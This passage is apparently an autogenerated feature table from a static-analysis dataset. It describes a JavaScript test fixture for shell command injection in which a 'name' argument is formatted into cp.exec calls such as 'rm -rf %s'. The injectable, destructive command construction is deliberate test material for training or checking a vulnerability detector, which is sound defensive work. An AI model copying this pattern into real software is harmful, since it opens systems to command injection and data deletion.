util.fo ... , name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:40 | util.fo ... , name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:40 | util.fo ... , name) | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:40 | util.fo ... , name) | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:40 | util.fo ... , name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:10:104:40 | util.fo ... , name) | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:15:104:20 | format | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:15:104:20 | format | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:15:104:20 | format | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:15:104:20 | format | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:15:104:20 | format | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:22:104:33 | "%s foo/bar" | CalleeFlexibleAccessPath | util.format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:22:104:33 | "%s foo/bar" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:22:104:33 | "%s foo/bar" | calleeImports | util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:22:104:33 | "%s foo/bar" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:22:104:33 | "%s foo/bar" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:22:104:33 | "%s foo/bar" | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:22:104:33 | "%s foo/bar" | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:22:104:33 | "%s foo/bar" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:22:104:33 | "%s foo/bar" | receiverName | util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:36:104:39 | name | CalleeFlexibleAccessPath | util.format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:36:104:39 | name | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:36:104:39 | name | calleeImports | util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:36:104:39 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:36:104:39 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:36:104:39 | name | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:36:104:39 | name | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:36:104:39 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:104:36:104:39 | name | receiverName | util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:2:106:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:2:106:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:2:106:3 | cp | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:2:106:3 | cp | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:2:106:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:2:106:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:2:106:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:2:106:8 | cp.exec | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:2:106:8 | cp.exec | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:2:106:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:2:106:57 | cp.exec ... name)) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:2:106:57 | cp.exec ... name)) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:2:106:57 | cp.exec ... name)) | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:2:106:57 | cp.exec ... name)) | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:2:106:57 | cp.exec ... name)) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:2:106:57 | exceptional return of cp.exec ... name)) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:2:106:57 | exceptional return of cp.exec ... name)) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:2:106:57 | exceptional return of cp.exec ... name)) | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:2:106:57 | exceptional return of cp.exec ... name)) | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:2:106:57 | exceptional return of cp.exec ... name)) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:5:106:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:5:106:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:5:106:8 | exec | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:5:106:8 | exec | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:5:106:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:13 | util | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:13 | util | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:13 | util | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:13 | util | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:13 | util | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:20 | util.format | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:20 | util.format | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:20 | util.format | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:20 | util.format | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:20 | util.format | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:56 | exceptional return of util.fo ... , name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:56 | exceptional return of util.fo ... , name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:56 | exceptional return of util.fo ... , name) | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:56 | exceptional return of util.fo ... , name) | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:56 | exceptional return of util.fo ... , name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:56 | util.fo ... , name) | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:56 | util.fo ... , name) | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:56 | util.fo ... , name) | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:56 | util.fo ... , name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:56 | util.fo ... , name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:56 | util.fo ... , name) | enclosingFunctionBody | name cp exec util format rm -rf %s name cp exec util format rm -rf '%s' name cp exec util format rm -rf '/foo/bar/%s' name cp exec util format %s foo/bar name cp exec util format for foo in (%s) do bar end name cp exec require printf rm -rf %s name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:56 | util.fo ... , name) | enclosingFunctionName | format | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:56 | util.fo ... , name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:10:106:56 | util.fo ... , name) | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:106:15:106:20 | format | contextFunctionInterfaces | 